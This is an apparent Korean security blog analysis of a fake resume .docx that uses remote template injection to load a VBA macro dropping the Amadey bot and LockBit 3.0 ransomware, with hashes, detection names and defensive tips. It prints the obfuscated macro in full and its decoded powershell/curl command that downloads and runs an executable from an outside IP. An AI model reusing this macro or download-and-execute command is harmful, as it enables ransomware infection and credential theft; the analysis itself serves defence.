꿈을꾸는 파랑새

아마디(Amadey) 봇은 2018년 처음 발견된 악성코드로서 컴퓨터의 데이터를 훔치는 것이 주목적이며 하지만 다운로드 및 설치 기능도 가지고 있기 때문에 여러 공격자는 아마디 봇을 다른 악성코드와 악성 페이로드를 유포하는 데 사용을 했으며 대표적으로 꽃개 랜섬웨어 인 갠드크랩(GandCrab) 랜섬웨어 와 플로드애미(FlawedAmmy)가 대표적입니다.
심시아.docx,임서은.docx,임규민.docx 등의 이름으로 유포가 되고 있으며 해당 악성코드는 LockBit 랜섬웨어를 유포하기 위해서 만들어진 악성코드입니다.

해당 악성코드는 지난 시간에 적은 이태원 참사 악성코드 등과 같이 원격 템플릿 주입(Remote Template Injection) 기술을 사용을 하고 있으며 간단하게 이야기하면 순간 외부 URL에 호스팅 된 진짜 콘텐츠를 가져옴으로써 변경될 수 있다는 특징을 가지고 있으며 공격자는 해당 URL 주소를 변경시켜 악성코드를 통해서 악성행위를 진행합니다.
먼저 해당 악성코드의 해쉬값은 다음과 같습니다.

이력서로 위장한 LockBit 랜섬웨어 문서 실행
이력서로 위장한 LockBit 랜섬웨어 문서 실행

파일명:심시아.docx
사이즈:155 KB
CRC32:9d94c9f0
MD5:13b12238e3a44bcdf89a7686e7179e16
SHA-1:b0fee72899c445da6b93777969ec58eabbafb709
SHA-256:142cbad8b9d400380c78935e60db104ec080812b1a298f9753a41b2811c856be
SHA-512:3720f30c0cc755453cfa2377fed631a7604c3059db1975077bfcaedb8b8ce901b24fd6e09d98b314b7fc650f06da8ad552f1a339ae82c3b5091dc75b2108a263

settings.xml 에 포함이 되어져 있는 악성코드 주소
settings.xml 에 포함이 되어져 있는 악성코드 주소

먼저 악성코드 C:\Users\사용자\Desktop\심시아\word\_rels 에 있는 settings.xml.rels 를 열어보면 다음과 같이 악성코드를 실행하기 위한 원격 템플릿 주입(Remote Template Injection)가 포함이 돼 있는 것을 확인할 수가 있습니다.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats(.)org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats(.)org/officeDocument/2006/relationships/attachedTemplate" Target="http://188.34.187(.)110/v5sqpe.dotm" 
TargetMode="External"/></Relationships>

해당 악성코드를 실행하면 v5sqpe(.)dotm 이라는 파일을 다운로드 하게 돼 있습니다.
해당 악성코드는 자동으로 다운로드 된 v5sqpe(.)dotm에는 VBA 매크로가 포함돼 있고 해당 악성코드를 실행을 다음과 같은 화면을 볼 수가 있습니다.
Enable content to adjust this document to your version of Microsoft Word
TO OPEN THIS DOCUMENT PLEASE FOLLOW THESE STEPS: 
Select Enable Editing 
In the Microsoft Office Security Option dialog box, select Enable Content 
If you are using a mobile device, try opening the fle using the full office desktop app

악성코드 매크로 실행
악성코드 매크로 실행

이라고 돼 있는데 일단 악성코드는 v5sqpe(.)dotm 를 다운로드 하고 해당 악성코드에 포함된 매크로 내용은 다음과 같습니다.

Private Sub Document_Open()
s4ytjqno = "(tthpz)"
rockbottom = "naakslookD5"
usa = "C:\U"
(an)dwt44d3 = Replace(":7tthpzC" & s4ytjqno & "4D", "tthpz", "2")
Set wx2zh8 = GetObject("NeW" & andwt44d3 & Right(rockbottom, 2) & "-D70A-438B-8A42-984" & CLng(1.6) & "4B88AFB" & CInt(8.4))
s4y(t)jqno = usa & "sers\Pub"
fp4fwut(f)s2n = s4ytjqno & "lic\skeml.l" & Left(rockbottom, 1) & Right(Left(rockbottom, 4), 1)
Set Reco = wx2zh8(.)CreateShortcut(fp4fwutf(s)2n)
hgmf = s4ytj(q)no & "lic\7894651321486654123(.)exe"
godk(no)ws = Replace("cmd /c pow^s4ytjqnors^hs4ytjqnoll/W 01 c^u^rl htt^p://188.34.187(.)110/1234.s4ytjqno^xs4ytjqno -o " & hgmf & (";") & hgmf, "s4ytj(q)no", "e")
Reco.Argume(n)ts = "/p c:\windows\system32 /m notepad(.)exe /c """ & godkno(w)s & """"
Reco.WindowStyle = 7
ne(b)bb = Repla(c)e("rundz_a_d_fz_a_d_f32 urz_a_d_f.dz_a_d_fz_a_d_f,OpenURL " & fp4fwu(t)fs2n, "z_a_d_f", "l")
Reco.Targ(e)tPath = Replace("@Or@i(L)eS", "@", "f")
Reco(.)Save
wx2zh8(.)exec neb(b)b
End Sub

이며 다음과 같이 실행이 됩니다.

 rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk->C:\Windows\system32\fOrfiLeS(.)exe" /p 
 c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers(^)hell/W 01 c^u^rl 
 htt^p://188.34.187(.)110/1234(.)e^xe -o C:\Users\Public\7894651321486654123(.)exe;C:\Users\Public\7894651321486654123(.)exe"->/c pow^ers^hell/W 01 c^u^rl htt^p://188.34.187(.)110/1234.e^xe -o C:\Users\Public\7894651321486654123(.)exe;C:\Users\Public\7894651321486654123(.)exe

fOrfiLeS(.)exe 실행 그리고 1234.exe 파일은 다운로더 로서 실행을 하고 나서 실행 후 C&C에서 cred.dll 파일을 다운로드 하고 Amadey Parameter(id,vs,os,bi,ar,pc,un,av,lv 등)가 사용을 하고 현재 컴퓨터 화면의 스크린 샷 및 프로그램의 계정정보도 함께 전송을 하면 다음 프로그램의 계정 정보를 탈취합니다.

C&C 서버 로그인 화면
C&C 서버 로그인 화면

WinBox
OutLook
FileZilla
Pidgin
TotalCommand FTP
RealVNC,TightVNC,TigerVNC,WinSCP 2

V3 랜섬웨어 보안 폴더 설정
V3 랜섬웨어 보안 폴더 설정

cred(.)dll 파일과 동시에 LockBit 3.0 랜섬웨어 실행을 해서 컴퓨터를 랜섬웨어에 감염을 시키는 방법을 사용하고 있습니다. 2022-11-11 19:55:31 UTC 기준 바이러스토탈(Virus Total)에서 탐지하는 보안 업체들은 다음과 같습니다.
Ad-Aware:Trojan.GenericKD.63268117
AhnLab-V3:Downloader/DOC.External
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan/Generic.ASHMacro.7D6
Arcabit:Trojan.Generic.D3C56515
Avast:OLE:RemoteTemplateInj [Trj]
AVG:OLE:RemoteTemplateInj [Trj]
Avira (no cloud):W97M/Dldr.TempInj.AI
BitDefender:Trojan.GenericKD.63268117
ClamAV:Doc.Downloader.TemplateInjection-6332119-0
Cynet:Malicious (score: 99)
Cyren:URL/CVE170199.GG.gen!Eldorado
Emsisoft:Trojan.GenericKD.63268117 (B)
eScan:Trojan.GenericKD.63268117
ESET-NOD32:DOC/TrojanDownloader.Agent.ARJ
Fortinet:MSOffice/Agent.B781!tr.dldr
GData:Trojan.GenericKD.63268117
Google:Detected
Kaspersky:HEUR:Trojan-Downloader.MSOffice.Dotmer.gen
Lionic:Trojan.MSOffice.Dotmer.a!c
MAX:Malware (ai Score=80)
McAfee-GW-Edition:Artemis!Trojan
Microsoft:Exploit:O97M/CVE-2017-0199.AL!MTB
NANO-Antivirus:Exploit.Xml.CVE-2017-0199.equmby
Rising:Exploit.ExtLink/OFFICE!1.C97A (CLASSIC)
Symantec:W97M.Downloader
Tencent:Trojan.Win32.Office_Dl.11025166
Trellix (FireEye):Trojan.GenericKD.63268117
TrendMicro:Trojan.W97M.AMADEY.THKAOBB
TrendMicro-HouseCall:Trojan.W97M.AMADEY.THKAOBB
VIPRE:Trojan.GenericKD.63268117
VirIT:W97M.Dwnldr.BQJ
ViRobot:DOC.S.CVE-2017-0199.159282

[소프트웨어 팁/보안 및 분석] - 안랩 V3 랜섬웨어 보호폴더 설정 방법

 

안랩 V3 랜섬웨어 보호폴더 설정 방법

오늘은 삼평동 연구소에서 제공하고 있는 V3 백신프로그램(안티바이러스) 프로그램에서 안랩 V3 랜섬웨어 보호 폴더 설정 방법 해서 랜섬웨어 로 부터 피해를 최소화하는 방법에 대해 알아보겠

wezard4u.tistory.com

이며 항상 백신 프로그램을 설치 실시간 업데이트 및 실시간 감시 그리고 사전 방역 시스템 등을 켜두고 컴퓨터를 사용하는 것이 좋으면 항상 기본적인 보안 수칙을 지키는 것이 안전하게 컴퓨터를 사용하는 방법 그리고 랜섬웨어 전용 방지 프로그램인 앱 체크를 사용한다고 하면 V3, 알약에서 기본적으로 있는 랜섬웨어 방지 기능은 비활성화시키고 사용을 하시면 될 것입니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band